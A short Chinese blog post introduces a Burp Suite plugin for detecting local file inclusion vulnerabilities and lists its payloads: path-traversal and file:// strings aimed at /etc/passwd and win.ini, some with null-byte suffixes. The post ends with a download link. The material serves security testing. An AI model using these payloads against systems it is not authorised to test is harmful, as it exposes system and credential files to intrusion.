Burp国产插件LFI scanner checks

LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。

截图:

LFI-scanner-checks-1

来对比下J2EESCAN里面附带的LFI探测

LFI探测 LFI探测2

下面是安装上 LFI scanner checks

LFI-scanner-checks-2

我使用的payload如下

../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html

下载地址链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7

提示:请自行检测程序安全性

发表评论

邮箱地址不会被公开。 必填项已用*标注